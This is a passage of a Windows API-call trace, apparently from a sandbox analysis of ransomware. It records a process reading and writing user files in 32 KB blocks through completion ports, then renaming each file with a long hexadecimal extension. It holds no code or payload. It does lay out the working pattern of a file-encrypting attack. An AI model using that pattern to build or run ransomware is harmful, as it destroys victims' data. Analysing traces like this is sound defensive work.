lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0164.586] RtlInterlockedCompareExchange64 () returned 0x7 [0164.587] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.587] WriteFile (in: hFile=0x590, lpBuffer=0x7610188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050) returned 1 [0164.588] RtlInterlockedCompareExchange64 () returned 0x8 [0164.588] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.589] WriteFile (in: hFile=0x5b0, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0164.590] RtlInterlockedCompareExchange64 () returned 0x9 [0164.590] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.590] WriteFile (in: hFile=0x5ac, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0164.592] RtlInterlockedCompareExchange64 () returned 0xa [0164.592] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.592] WriteFile (in: hFile=0x58c, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0164.594] RtlInterlockedCompareExchange64 () returned 0xb [0164.594] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.595] WriteFile (in: hFile=0x5b8, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0164.596] RtlInterlockedCompareExchange64 () returned 0xc [0164.596] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.596] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x73e00f8, ReturnLength=0x72aff5c) returned 0x0 [0164.598] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif", lpString2=".DEE575B9BB025795EF9A3F0B925132F8D3BD499AE0E46DAAFCC1977CF57A095C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif.DEE575B9BB025795EF9A3F0B925132F8D3BD499AE0E46DAAFCC1977CF57A095C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif.DEE575B9BB025795EF9A3F0B925132F8D3BD499AE0E46DAAFCC1977CF57A095C" [0164.598] GetProcessHeap () returned 0x270000 [0164.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425d7b0 [0164.598] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x72aff4c, FileInformation=0x425d7b0, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.599] CloseHandle (hObject=0x4a8) returned 1 [0164.604] GetProcessHeap () returned 0x270000 [0164.606] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0164.607] RtlInterlockedCompareExchange64 () returned 0xd [0164.607] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.607] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x75f0100, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x75f0100, ReturnLength=0x72aff5c) returned 0x0 [0164.608] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt", lpString2=".BB477DB4864C8764D9E0E073D2983F307C4392080D6F683AF6292C0692AFE046" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt.BB477DB4864C8764D9E0E073D2983F307C4392080D6F683AF6292C0692AFE046") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt.BB477DB4864C8764D9E0E073D2983F307C4392080D6F683AF6292C0692AFE046" [0164.608] GetProcessHeap () returned 0x270000 [0164.608] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x425d8e8 [0164.609] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x425d8e8, Length=0x130, FileInformationClass=0xa) returned 0x0 [0164.611] CloseHandle (hObject=0x590) returned 1 [0164.615] GetProcessHeap () returned 0x270000 [0164.617] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0164.625] RtlInterlockedCompareExchange64 () returned 0xc [0164.625] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.625] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0164.627] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3", lpString2=".D0104A60F274A0B7A59EF8CFB8A3CC4BC1297BF446ACC84F4D8368EC08A3A870" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3.D0104A60F274A0B7A59EF8CFB8A3CC4BC1297BF446ACC84F4D8368EC08A3A870") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3.D0104A60F274A0B7A59EF8CFB8A3CC4BC1297BF446ACC84F4D8368EC08A3A870" [0164.627] GetProcessHeap () returned 0x270000 [0164.627] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425da20 [0164.627] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x425da20, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.629] CloseHandle (hObject=0x5b0) returned 1 [0164.630] GetProcessHeap () returned 0x270000 [0164.632] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0164.634] RtlInterlockedCompareExchange64 () returned 0xb [0164.634] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.634] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74723c8, ReturnLength=0x72aff5c) returned 0x0 [0164.635] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps", lpString2=".8635675D980E82580AEA8D3961A5C6C0D4C1990BFE68C672A112D97514C0D531" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps.8635675D980E82580AEA8D3961A5C6C0D4C1990BFE68C672A112D97514C0D531") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps.8635675D980E82580AEA8D3961A5C6C0D4C1990BFE68C672A112D97514C0D531" [0164.635] GetProcessHeap () returned 0x270000 [0164.635] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42761b0 [0164.635] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x72aff4c, FileInformation=0x42761b0, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0164.639] CloseHandle (hObject=0x5ac) returned 1 [0164.649] GetProcessHeap () returned 0x270000 [0164.651] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0164.652] RtlInterlockedCompareExchange64 () returned 0xa [0164.652] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.652] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x750a220, ReturnLength=0x72aff5c) returned 0x0 [0164.653] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a", lpString2=".9C3BE64F996879C4B33DD0AEF403CD9F83FA5A5D9FD75F2D3286A46101F5524A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a.9C3BE64F996879C4B33DD0AEF403CD9F83FA5A5D9FD75F2D3286A46101F5524A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a.9C3BE64F996879C4B33DD0AEF403CD9F83FA5A5D9FD75F2D3286A46101F5524A" [0164.653] GetProcessHeap () returned 0x270000 [0164.653] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x76b8850 [0164.653] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x76b8850, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.655] CloseHandle (hObject=0x58c) returned 1 [0164.660] GetProcessHeap () returned 0x270000 [0164.661] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0164.669] RtlInterlockedCompareExchange64 () returned 0x9 [0164.669] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.669] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7532378, ReturnLength=0x72aff5c) returned 0x0 [0164.670] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3", lpString2=".807A64FA8580AE80E5C10B3287727B8E3F62507374DB47AC9C8F0D9998FF716E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3.807A64FA8580AE80E5C10B3287727B8E3F62507374DB47AC9C8F0D9998FF716E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3.807A64FA8580AE80E5C10B3287727B8E3F62507374DB47AC9C8F0D9998FF716E" [0164.670] GetProcessHeap () returned 0x270000 [0164.670] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425db58 [0164.670] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x72aff4c, FileInformation=0x425db58, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.673] CloseHandle (hObject=0x5b8) returned 1 [0164.678] GetProcessHeap () returned 0x270000 [0164.680] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0164.714] RtlInterlockedCompareExchange64 () returned 0x1 [0164.714] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.719] ReadFile (in: hFile=0x5e4, lpBuffer=0x77c9050, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a8f18 | out: lpBuffer=0x77c9050*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a8f18) returned 1 [0164.720] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.722] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x77a8fc8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x77a8fc8, ReturnLength=0x72aff5c) returned 0x0 [0164.723] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods", lpString2=".1D9F9C431BA886C0FB81E8A84C73B9E00239AE36F4E6A900EEEEAEB7A7CAA555" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods.1D9F9C431BA886C0FB81E8A84C73B9E00239AE36F4E6A900EEEEAEB7A7CAA555") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods.1D9F9C431BA886C0FB81E8A84C73B9E00239AE36F4E6A900EEEEAEB7A7CAA555" [0164.723] GetProcessHeap () returned 0x270000 [0164.723] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4262c98 [0164.724] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x72aff4c, FileInformation=0x4262c98, Length=0x132, FileInformationClass=0xa) returned 0x0 [0164.726] CloseHandle (hObject=0x5e4) returned 1 [0164.730] GetProcessHeap () returned 0x270000 [0164.733] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77a8f18 | out: hHeap=0x270000) returned 1 [0164.753] RtlInterlockedCompareExchange64 () returned 0x1 [0164.753] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.851] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.851] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.856] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.858] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a", lpString2=".7CD5FF3C58ED8A655B80F1CE9D7D1C7AAA8700A476618B84BF9A730DAD97786C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a.7CD5FF3C58ED8A655B80F1CE9D7D1C7AAA8700A476618B84BF9A730DAD97786C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a.7CD5FF3C58ED8A655B80F1CE9D7D1C7AAA8700A476618B84BF9A730DAD97786C" [0164.858] GetProcessHeap () returned 0x270000 [0164.858] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425dc90 [0164.858] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425dc90, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.860] CloseHandle (hObject=0x598) returned 1 [0164.865] GetProcessHeap () returned 0x270000 [0164.867] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.867] RtlInterlockedCompareExchange64 () returned 0x1 [0164.867] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.870] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.871] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.873] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.875] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx", lpString2=".B962ECC40E92BC2E1E11841FF2669A2FE94D6D03B0D6CB9AAE9AB8E90001E532" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx.B962ECC40E92BC2E1E11841FF2669A2FE94D6D03B0D6CB9AAE9AB8E90001E532") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx.B962ECC40E92BC2E1E11841FF2669A2FE94D6D03B0D6CB9AAE9AB8E90001E532" [0164.875] GetProcessHeap () returned 0x270000 [0164.875] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425ddc8 [0164.875] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425ddc8, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.877] CloseHandle (hObject=0x598) returned 1 [0164.878] GetProcessHeap () returned 0x270000 [0164.880] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.880] RtlInterlockedCompareExchange64 () returned 0x1 [0164.880] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.884] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.884] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.886] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.887] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3", lpString2=".B2723CF98899FC98DF1DD5D8D0963C553B337A8FF4CA28DD38BD1BFAD1BAE67B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3.B2723CF98899FC98DF1DD5D8D0963C553B337A8FF4CA28DD38BD1BFAD1BAE67B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3.B2723CF98899FC98DF1DD5D8D0963C553B337A8FF4CA28DD38BD1BFAD1BAE67B" [0164.887] GetProcessHeap () returned 0x270000 [0164.887] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425df00 [0164.887] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425df00, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.889] CloseHandle (hObject=0x598) returned 1 [0164.894] GetProcessHeap () returned 0x270000 [0164.896] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.896] RtlInterlockedCompareExchange64 () returned 0x1 [0164.896] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.901] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.901] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.906] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.908] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3", lpString2=".F75572D5015D966032051ACCD091DA0AD7A7A6303C1CC5F249D8D285F19CF941" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3.F75572D5015D966032051ACCD091DA0AD7A7A6303C1CC5F249D8D285F19CF941") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3.F75572D5015D966032051ACCD091DA0AD7A7A6303C1CC5F249D8D285F19CF941" [0164.908] GetProcessHeap () returned 0x270000 [0164.908] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x425e038 [0164.908] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425e038, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0164.910] CloseHandle (hObject=0x598) returned 1 [0164.916] GetProcessHeap () returned 0x270000 [0164.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.917] RtlInterlockedCompareExchange64 () returned 0x1 [0164.917] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.922] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.923] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.924] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.926] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav", lpString2=".501C4EF0A4D0439F4CDB1B529ED2065ACF425C20940106A6A5EB8E3FE8463524" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav.501C4EF0A4D0439F4CDB1B529ED2065ACF425C20940106A6A5EB8E3FE8463524") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav.501C4EF0A4D0439F4CDB1B529ED2065ACF425C20940106A6A5EB8E3FE8463524" [0164.926] GetProcessHeap () returned 0x270000 [0164.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425e170 [0164.926] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425e170, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.937] CloseHandle (hObject=0x598) returned 1 [0164.942] GetProcessHeap () returned 0x270000 [0164.943] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 